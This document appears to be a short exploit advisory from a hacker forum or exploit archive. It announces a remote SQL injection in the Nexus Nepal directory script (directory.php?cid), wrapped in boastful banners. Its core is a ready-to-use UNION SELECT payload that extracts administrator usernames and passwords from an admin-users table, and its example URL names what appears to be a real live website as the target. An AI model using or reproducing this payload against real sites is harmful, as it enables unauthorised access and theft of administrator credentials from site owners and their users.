############################### IRANIAN THE BEST HACKERS IN THE WORLD ################## #################### #################### ## ## Remote SQL injection Vulnerability ## ## Nexus Nepall (directory.php?cid) ## ############################################################### ############################################################### ############################################################### ############################################################### ## ## AuTh0r : Ehsan_Hp200 ## ## H0ME : www.ehsanhp.blogsky.com ## ## Email : Ehsan_Hp200@Hotmail.com ## ## Vendor : http://www.nexusnepal.com/ ## ## Persian Gulf 4 Ever! ############################# ############################# ############################# ############################# ############################# ## ## Exploite: www.victim.com/directory.php?cid=[SQL] Example : http://welcomenepal.com/promotional/directory.php?cid=-5 Union Select Null,concat(username,0x3a,user_password) From tbl_admin_users ######################################################################################### SpeCial TanX To : Dj7Xpl ########################################################################################## ############################### IRANIAN THE BEST HACKERS IN THE WORLD ##################